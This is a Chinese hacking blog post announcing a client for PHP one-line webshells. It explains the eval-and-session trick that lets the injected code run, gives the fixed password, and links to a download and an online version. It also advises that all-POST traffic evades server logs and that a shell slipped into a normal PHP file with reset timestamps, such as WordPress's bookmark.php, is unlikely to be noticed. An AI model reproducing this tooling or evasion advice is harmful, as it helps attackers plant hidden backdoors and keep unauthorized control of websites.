查看文章 |
Author:零魂(zerosoul) 前天通宵到后半夜的时候,总觉得自己最近都没干什么实事,觉得有点虚度的味道,心中不免有些自责。为了宽慰自己,决定做点正事。然后就啥都没干,坐着干想该做什么。一直想到快天亮,总算想出点东西来了(- -!),也就是现在发布的这个东西。 海洋顶端有个一键提交版的ASP一句话客户端,很方便,一次提交之后,一句话就可以当大马用了 但是PHP一句话一直没有见这样的客户端(不知道是不是我孤弱寡闻),网上居然还有转载的到处都是的工具,结果下载下来不能用..... 注意: 由于一键提交版的特殊性,暂时是不能随心所欲的换密码的,这个客户端的密码是字母c。(海洋的也是这样)。这个问题并不是不能解决,但是比较麻烦,所以还不如就用这密码呢,呵呵。 特点: 1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。 2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST) 大概原理: 一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单: c = session_start();eval($_SESSION[chr(99)]); chr(99)就是字母c,为了避免单引号写成chr(99)形式。 然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。 想用其它密码的朋友可以依据这个原理修改。 下载: http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar 在线使用: http://evilwares.appspot.com/static/eval.html -------------------- 才刚刚做出来,并没有做过多测试,如果有什么问题欢迎大家反馈(不过就怕我过了这份热度就对它也没兴趣了,呵呵。) 海洋是人家lcx好几年前的作品,我们现在还在探究人家早年就在用的技术,就像pjf的兵刃我上高中的时候就已经是流行度很高的利器了,到现在仍然有不少人在研究兵刃上面用到的各种牛X技术,唉,真是惭愧啊惭愧...... 下面是测试截图: 1-A:单文件测试-代码
1-B:单文件测试-直接运行
1-C:单文件测试-客户端
1-D:单文件测试-连接一句话
1-E:单文件测试-登陆使用
2-A:插入正常文件测试-代码(这里我插的是我机器上WordPress的bookmark.php)
2-A:插入正常文件测试-连接
2-A:插入正常文件测试-登陆使用
|
